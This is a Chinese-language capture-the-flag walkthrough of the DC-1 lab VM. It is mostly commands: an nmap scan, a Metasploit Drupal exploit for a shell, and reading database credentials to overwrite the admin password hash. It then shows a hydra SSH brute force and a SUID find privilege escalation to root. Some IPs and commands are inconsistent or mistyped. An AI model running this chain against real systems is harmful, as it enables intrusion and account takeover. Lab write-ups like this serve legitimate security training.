DC-1靶场

kali: 192.168.65.148
DC1 : 192.168.65.149

arp-scan -l: 扫网段同一网段内的主机确定DC靶场的IP地址

通过前面看Kali网段的设置得出靶机IP地址

DC1 : 192.168.65.149

nmap -sV -p- 192.168.65.149

-sV 参数表示进行版本探测，-p- 参数表示扫描所有端口
  

Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-30 21:44 CST
Nmap scan report for 192.168.65.149
Host is up (0.0011s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
80/tcp    open  http    Apache httpd 2.2.22 ((Debian))  // 版本信息
111/tcp   open  rpcbind 2-4 (RPC #100000)
32990/tcp open  status  1 (RPC #100024)

whatweb -v 192.168.120.128  // 扫描指纹为cms找day打,也可以是Wappy插件

msfconsole  // 打开msf

search drupal  // 寻找历史漏洞

uer 1  // 选择最新的漏洞 18年的也就是模块2

show options // 查看各模块参数

set lhosts 192.168.65.149   // 设置靶机受攻击的IP 其余默认就可以默认是80端口

run  // 开始攻击

响应显示已经建立连接也就是攻击成功

shell // 拿到shell

ls   // 列出所有文件

python -c 'import pty; pty.spawn("/bin/bash")'  // 交互式shell 前提机器装有python

tac flag1.txt // 查看flag1.txt 第一个靶标内容

flag1.txt:

Every good CMS needs a config file - and so do you  // 给出提示
每一个好的CMS都需要一个配置文件你也一样

------------------------------

find / -name flag*   // 在整个文件系统中查找文件名以 flage开头的目录或者文件

find 是一个强大的命令行工具，用于在文件系统中查找文件和目录。
/ 表示从根目录开始查找
-name 参数指定了要查找的文件名模式
 "flag" 开头的文件名
 * 是通配符，表示匹配任意字符。

cat `find / -name settings.php`  // 打开配置文件

mysql -udbuser -pR0ck3t   // -u 表示用户名 -p 密码

use drupaldb // 切换数据库

show tables;  // 列出所有表寻找flag

select * from users

得到两个用户,并且密码不是明文,方法1是修改admin的密码 方法2添加一个新的用户

admin:  pass $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR
Fred :  pass $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg

/var/www/scripts/password-hash.sh  

exit  // 退出数据库

php /var/www/scripts/password-hash.sh 123456   

-------------------------------------------------

密码加密后的值: $S$DGlF6YaIytT1SPH8h/93JqpZm6vkFTqj2qGrgeOOEcY8A0wrLhxE 

mysql -udbuser -pR0ck3t
 
use drupaldb;  // 切换数据库

// or 修改 admin 和 Fred 密码
update users set pass = "$S$D1UQvb3x7lKoCSX6S9K.r.wB202Lsa/r7fkOj7CelJsSEMFDJjGv" where name = 'admin' or name = 'Fred';

user : admin
pass : 123456

/etc/passwd

该文件存储了系统用户的基本信息，所有用户都可以对其进行文件操作读

/etc/shadow

该文件存储了系统用户的密码等信息，只有root权限用户才能读取

exit
 
tac /etc/passwd  // 查看用户信息

hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.65.149

-l flae4: 指定爆破用户名
-P :指定了爆破的密码字典列表
ssh: 目标IP地址

ssh 用户名@目标攻击主机

ssh flag4@192.168.120.128  // IP就是目标地址

cat flag4.txt

----------------------------------

Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy.  Or maybe it is?

你能用同样的方法找到还是访问根中的标志？可能吧。但也许没那么容易。或者可能是？

查找具有 Setuid 权限的文件
Setuid 权限是一种特殊的权限，允许普通用户以拥有该文件所有者的权限来执行该文件。

find / -perm -u=s -type f 2>/dev/null

--------------------------------------------------------

find：用于在文件系统中搜索文件和目录。
/：指定搜索的起始路径为根目录，也就是整个文件系统。
-perm -u=s：指定要搜索的文件权限。
-perm 选项用于匹配指定的权限，
-u 表示用户权限，s 表示 Setuid 权限。因此，-perm -u=s 表示搜索具有 Setuid 权限的文件

-type f：指定要搜索的文件类型为普通文件

2>/dev/null：将错误输出重定向到 /dev/null，这样可以隐藏搜索过程中产生的错误信息

在文件系统中查找名为 "index.php" 的文件，并在找到的每个文件上执行 "/bin/sh" 命令

find / -name index.php -exec "/bin/sh" \;

----------------------------------------------------------

find：用于在文件系统中搜索文件和目录。
/：指定搜索的起始路径为根目录，也就是整个文件系统。
-name index.php：指定要搜索的文件名为 "index.php"。
-exec：用于在找到的每个文件上执行指定的命令。
"/bin/sh"：要执行的命令是 "/bin/sh"，它是一个常见的 Unix/Linux shell。
\;：表示命令的结束。

cd / root    // 切换目录

ls  //  列出所有文件

cat thefinalflag.txt   //读取flag 

Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7

完成了！！！
希望你已经享受了这一点，并学到了一些新的技能